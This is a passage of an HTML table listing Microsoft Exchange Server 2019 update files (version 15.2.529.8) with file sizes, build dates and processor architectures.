9.8</td><td>23,928</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.529.8</td><td>97,896</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.529.8</td><td>1,266,256</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.529.8</td><td>1,266,256</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>15,848</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.529.8</td><td>87,416</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,576</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.strings.dll.deploy</td><td>15.2.529.8</td><td>52,088</td><td>01-Jan-2020</td><td>11:21</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.mailboxsearch.dll</td><td>15.2.529.8</td><td>292,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.birthdaycalendar.dll</td><td>15.2.529.8</td><td>73,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.defaultservicesettings.dll</td><td>15.2.529.8</td><td>45,952</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.dll</td><td>15.2.529.8</td><td>218,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.booking.management.dll</td><td>15.2.529.8</td><td>78,208</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.bookings.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.calendaring.dll</td><td>15.2.529.8</td><td>936,552</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.common.dll</td><td>15.2.529.8</td><td>336,256</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.connectors.dll</td><td>15.2.529.8</td><td>52,600</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.contentsubmissions.dll</td><td>15.2.529.8</td><td>32,128</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.context.dll</td><td>15.2.529.8</td><td>60,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.datamodel.dll</td><td>15.2.529.8</td><td>853,880</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.fileproviders.dll</td><td>15.2.529.8</td><td>291,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.foldersharing.dll</td><td>15.2.529.8</td><td>39,288</td><td>01-Jan-2020</td><td>
11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.holidaycalendars.dll</td><td>15.2.529.8</td><td>76,360</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.insights.dll</td><td>15.2.529.8</td><td>166,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetinglocation.dll</td><td>15.2.529.8</td><td>1,486,720</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingparticipants.dll</td><td>15.2.529.8</td><td>122,448</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.meetingtimecandidates.dll</td><td>15.2.529.8</td><td>12,327,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.onlinemeetings.dll</td><td>15.2.529.8</td><td>264,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.people.dll</td><td>15.2.529.8</td><td>37,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.peopleinsights.dll</td><td>15.2.529.8</td><td>186,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.reminders.dll</td><td>15.2.529.8</td><td>64,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.schedules.dll</td><td>15.2.529.8</td><td>84,064</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.shellservice.dll</td><td>15.2.529.8</td><td>63,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.tasks.dll</td><td>15.2.529.8</td><td>100,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entities.xrm.dll</td><td>15.2.529.8</td><td>144,768</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.entityextraction.calendar.dll</td><td>15.2.529.8</td><td>270,200</td><td>01-Jan-2020</td><td
>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.common.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.configuration.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.eserepl.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.ews.configuration.dll</td><td>15.2.529.8</td><td>254,336</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>15.2.529.8</td><td>37,240</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>15.2.529.8</td><td>640,592</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.529.8</td><td>37,240</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.529.8</td><td>146,512</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.529.8</td><td>594,296</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.529.8</td><td>99,704</td><td>01-Jan-2020</td><td>11:22</td>
<td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.529.8</td><td>42,360</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.529.8</td><td>40,320</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.529.8</td><td>54,136</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.529.8</td><td>164,224</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.529.8</td><td>58,952</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.529.8</td><td>204,160</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.529.8</td><td>17,784</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.529.8</td><td>30,800</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.529.8</td><td>38,784</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.529.8</td><td>48,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.529.8</td><td>180,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.529.8</td><td>36,736</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.529.8</td><td>25,976</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.529.8</td><td>1,868,152</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Micro
soft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.529.8</td><td>54,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.529.8</td><td>35,912</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.529.8</td><td>263,040</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.529.8</td><td>263,040</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.529.8</td><td>53,328</td><td>01-Jan-2020</td><td>11:19</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.529.8</td><td>217,160</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.529.8</td><td>32,128</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.529.8</td><td>282,192</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.529.8</td><td>19,016</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.529.8</td><td>83,832</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.529.8</td><td>15,232</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.529.8</td><td>94,072</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.529.8</td><td>1,840,000</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.529.8</td><td>71,544</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.529.8</td><td>175,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.529.8</td><td>45,944</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.529.8</td><td>159,608</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.529.8</td><td>51,072</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.529.8</td><td>46,160</td><td>01-Jan-2020</td><td>11:22</t
d><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.529.8</td><td>32,336</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.529.8</td><td>100,224</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.529.8</td><td>271,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.529.8</td><td>22,392</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.529.8</td><td>27,520</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.529.8</td><td>22,392</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.529.8</td><td>66,432</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.529.8</td><td>29,568</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.529.8
</td><td>19,840</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.529.8</td><td>20,344</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.529.8</td><td>19,320</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.529.8</td><td>34,176</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.529.8</td><td>103,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.529.8</td><td>31,616</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.529.8</td><td>20,856</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.529.8</td><td>49,016</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.529.8</td><td>44,408</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.529.8</td><td>38,264</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.529.8</td><td>10,375,248</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</
td><td>15.2.529.8</td><td>29,048</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.529.8</td><td>21,584</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.529.8</td><td>24,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.529.8</td><td>21,880</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.529.8</td><td>89,472</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.529.8</td><td>20,856</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.529.8</td><td>26,488</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.529.8</td><td>21,584</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.529.8</td><td>28,024</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.529.8</td><td>28,536</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.529.8</td><td>36,216</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.529.8</td><td>17,000</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.529.
8</td><td>19,832</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.529.8</td><td>17,488</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.529.8</td><td>20,048</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.529.8</td><td>16,256</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.529.8</td><td>52,816</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll<
/td><td>15.2.529.8</td><td>34,168</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.529.8</td><td>19,016</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.529.8</td><td>165,448</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.529.8</td><td>54,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.529.8</td><td>9,055,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.529.8</td><td>124,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.529.8</td><td>82,808</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.529.8</td><td>14,416</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.529.8</td><td>661,376</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.529.8</td><td>63,360</td><td>01-Jan-2020</td><td
>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.529.8</td><td>175,480</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.529.8</td><td>2,791,808</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.529.8</td><td>151,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.529.8</td><td>966,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.529.8</td><td>185,424</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.529.8</td><td>31,616</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.529.8</td><td>105,848</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.529.8</td><td>95,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.529.8</td><td>43,392</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pro
xyservice.dll</td><td>15.2.529.8</td><td>172,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.529.8</td><td>102,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.529.8</td><td>98,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.529.8</td><td>188,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.529.8</td><td>447,352</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.529.8</td><td>90,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.529.8</td><td>107,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.529.8</td><td>374,656</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.529.8</td><td>193,920</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.529.8</td><td>552,312</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.529.8</td><td>15,736<